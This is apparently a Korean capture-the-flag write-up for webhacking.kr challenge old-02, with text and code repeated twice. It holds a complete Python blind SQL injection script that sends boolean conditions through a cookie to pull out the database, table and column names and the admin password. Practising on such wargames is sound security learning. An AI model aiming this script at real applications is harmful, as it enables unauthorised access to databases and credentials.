old-02 (500)

Last updated 5 years ago

Was this helpful?

old-02 (500)

페이지 소스를 보면 아래와 같다.

<!--
2020-01-16 04:23:24
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->

에 접속하면 패스워드를 제출하는 폼이 존재한다.

다시 돌아와서, 쿠키를 확인해보았더니 time이라는 이름의 쿠키가 있다.

쿠키 값이 true인 경우 페이지 소스의 시각이 2070-01-01 09:00:01 가 되었고, false인 경우 2070-01-01 09:00:00 가 되었다.

여기서 본 문제가 Blind SQL Injection과 관련된 문제라고 추측할 수 있다.

파이썬으로 코드를 짜보면 아래와 같다.

import urllib.request

URL = 'https://webhacking.kr/challenge/web-02/'
TRUE_PHRASE = '2070-01-01 09:00:01'


def query(payload):
    req = urllib.request.Request(URL)
    req.add_header('Cookie', 'time=' + payload)
    r = urllib.request.urlopen(req)
    content = r.read().decode('utf-8')
    return TRUE_PHRASE in content


# 6
def find_db_name_len():
    db_name_len = 1
    while query('LENGTH(DATABASE()) = {}'.format(db_name_len)) is False:
        db_name_len += 1
    print('db_name_len: {}'.format(db_name_len))
    return db_name_len


# chall2
def find_db_name():
    db_name_len = find_db_name_len()
    db_name = ''
    for pos in range(1, db_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR(DATABASE(), {}, 1)) = {}'.format(pos, character)) is True:
                db_name += chr(character)
                break
    print('db_name: {}'.format(db_name))
    return db_name


# 13
def find_table_name_length(db_name):
    table_name_len = 1
    while query('LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="{}" LIMIT 0, 1)) = {}'.format(db_name, table_name_len)) is False:
        table_name_len += 1
    print('table_name_len: {}'.format(table_name_len))
    return table_name_len


# admin_area_pw
def find_table_name():
    db_name = find_db_name()
    table_name_len = find_table_name_length(db_name)
    table_name = ''
    for pos in range(1, table_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = "{}" LIMIT 0, 1), {}, 1)) = {}'.format(db_name, pos, character)) is True:
                table_name += chr(character)
                break
    print('table_name: {}'.format(table_name))
    return table_name


# 2
def find_column_name_length(table_name):
    column_name_len = 1
    while query('LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1)) = {}'.format(table_name, column_name_len)) is False:
        column_name_len += 1
    print('column_name_len: {}'.format(column_name_len))
    return column_name_len


# pw
def find_column_name(table_name):
    column_name_len = find_column_name_length(table_name)
    column_name = ''
    for pos in range(1, column_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1), {}, 1)) = {}'.format(table_name, pos, character)) is True:
                column_name += chr(character)
                break
    print('column_name: {}'.format(column_name))
    return column_name


# 17
def find_pw_length(column_name, table_name):
    pw_len = 1
    while query('LENGTH((SELECT {} FROM {} LIMIT 0, 1)) = {}'.format(column_name, table_name, pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# kudos_to_beistlab
def find_pw():
    table_name = find_table_name()
    column_name = find_column_name(table_name)
    pw_len = find_pw_length(column_name, table_name)
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT {} FROM {} LIMIT 0, 1), {}, 1)) = {}'.format(column_name, table_name, pos, character)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()

코드 실행결과, pw 는 kudos_to_beistlab 임을 알 수 있다.

Previousold-01 (200)Nextold-03 (350)

Last updated 5 years ago

Was this helpful?

페이지 소스를 보면 아래와 같다.

<!--
2020-01-16 04:23:24
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->

에 접속하면 패스워드를 제출하는 폼이 존재한다.

다시 돌아와서, 쿠키를 확인해보았더니 time이라는 이름의 쿠키가 있다.

쿠키 값이 true인 경우 페이지 소스의 시각이 2070-01-01 09:00:01 가 되었고, false인 경우 2070-01-01 09:00:00 가 되었다.

여기서 본 문제가 Blind SQL Injection과 관련된 문제라고 추측할 수 있다.

파이썬으로 코드를 짜보면 아래와 같다.

import urllib.request

URL = 'https://webhacking.kr/challenge/web-02/'
TRUE_PHRASE = '2070-01-01 09:00:01'


def query(payload):
    req = urllib.request.Request(URL)
    req.add_header('Cookie', 'time=' + payload)
    r = urllib.request.urlopen(req)
    content = r.read().decode('utf-8')
    return TRUE_PHRASE in content


# 6
def find_db_name_len():
    db_name_len = 1
    while query('LENGTH(DATABASE()) = {}'.format(db_name_len)) is False:
        db_name_len += 1
    print('db_name_len: {}'.format(db_name_len))
    return db_name_len


# chall2
def find_db_name():
    db_name_len = find_db_name_len()
    db_name = ''
    for pos in range(1, db_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR(DATABASE(), {}, 1)) = {}'.format(pos, character)) is True:
                db_name += chr(character)
                break
    print('db_name: {}'.format(db_name))
    return db_name


# 13
def find_table_name_length(db_name):
    table_name_len = 1
    while query('LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="{}" LIMIT 0, 1)) = {}'.format(db_name, table_name_len)) is False:
        table_name_len += 1
    print('table_name_len: {}'.format(table_name_len))
    return table_name_len


# admin_area_pw
def find_table_name():
    db_name = find_db_name()
    table_name_len = find_table_name_length(db_name)
    table_name = ''
    for pos in range(1, table_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = "{}" LIMIT 0, 1), {}, 1)) = {}'.format(db_name, pos, character)) is True:
                table_name += chr(character)
                break
    print('table_name: {}'.format(table_name))
    return table_name


# 2
def find_column_name_length(table_name):
    column_name_len = 1
    while query('LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1)) = {}'.format(table_name, column_name_len)) is False:
        column_name_len += 1
    print('column_name_len: {}'.format(column_name_len))
    return column_name_len


# pw
def find_column_name(table_name):
    column_name_len = find_column_name_length(table_name)
    column_name = ''
    for pos in range(1, column_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1), {}, 1)) = {}'.format(table_name, pos, character)) is True:
                column_name += chr(character)
                break
    print('column_name: {}'.format(column_name))
    return column_name


# 17
def find_pw_length(column_name, table_name):
    pw_len = 1
    while query('LENGTH((SELECT {} FROM {} LIMIT 0, 1)) = {}'.format(column_name, table_name, pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# kudos_to_beistlab
def find_pw():
    table_name = find_table_name()
    column_name = find_column_name(table_name)
    pw_len = find_pw_length(column_name, table_name)
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT {} FROM {} LIMIT 0, 1), {}, 1)) = {}'.format(column_name, table_name, pos, character)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()

코드 실행결과, pw 는 kudos_to_beistlab 임을 알 수 있다.

이 값을 의 폼에 넣고 제출하면 문제가 풀린다.